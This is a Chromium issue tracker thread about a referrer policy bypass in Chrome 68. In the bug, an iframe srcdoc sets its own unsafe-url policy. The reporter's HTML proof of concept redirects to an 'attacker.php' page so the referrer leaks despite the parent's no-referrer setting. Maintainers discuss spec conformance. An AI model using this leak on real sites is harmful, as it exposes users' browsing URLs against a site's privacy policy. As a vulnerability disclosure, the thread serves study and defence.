Issue metadata
Sign in to add a comment
|
Security: referrer policy bypass using iframe srcdoc
Reported by
zxyrz...@gmail.com,
Aug 28
|
||||||||||||||||||||||
Issue descriptionUserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Steps to reproduce the problem: 1. open http://test.au1ge.xyz/referrer/secret_page.php What is the expected behavior? referrer should not sent What went wrong? Just like https://bugs.chromium.org/p/chromium/issues/detail?id=763194 main frame' s referrer policy could be bypassed Did this work before? N/A Chrome version: 68.0.3440.106 Channel: stable OS Version: OS X 10.13.6 Flash Version: Shockwave Flash 30.0 r0
,
Aug 28
OP -- thanks for filing the issue. Can you please post the contents of 'secret_page.php'?
,
Aug 28
,
Aug 28
Sorry I should use .html suffix, there is no more than html contents ``` <meta name="referrer" content="no-referrer"> referrer not leaked: <iframe srcdoc="<script>location.href='http://test.au1ge.xyz/referrer/attacker.php'</script>"></iframe> <br> referrer leaked: <iframe srcdoc="<meta name='referrer' content='unsafe-url'><script>location.href='http://test.au1ge.xyz/referrer/attacker.php'</script>"></iframe> ```
,
Aug 28
,
Aug 28
,
Aug 29
,
Sep 6
can you eplain why the referrer should not be sent? You're explicitly setting the policy to unsafe-url
,
Sep 6
My point is a nested frame which inherited the security origin from top frame should respect it's top frame's referrer policy no matter the nested frame has it's own referrer policy or not, because if the nested frame's referrer leaked, it's the same as top frame's referrer leaked, which break top frame's referrer policy
,
Sep 6
ok, I can see your point. This is however not how the feature is specced. If you want, you start a discussion on the referrer policy spec about this, but until then, I can't change the implementation to violate the spec
,
Oct 22
I created an issue on https://github.com/w3c/webappsec-referrer-policy/issues/116, and they pointed out that it's the right way, so I think it's necessary to change the implementation
,
Oct 24
Issue 898224 has been merged into this issue.
,
Dec 13
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by zxyrz...@gmail.com
, Aug 28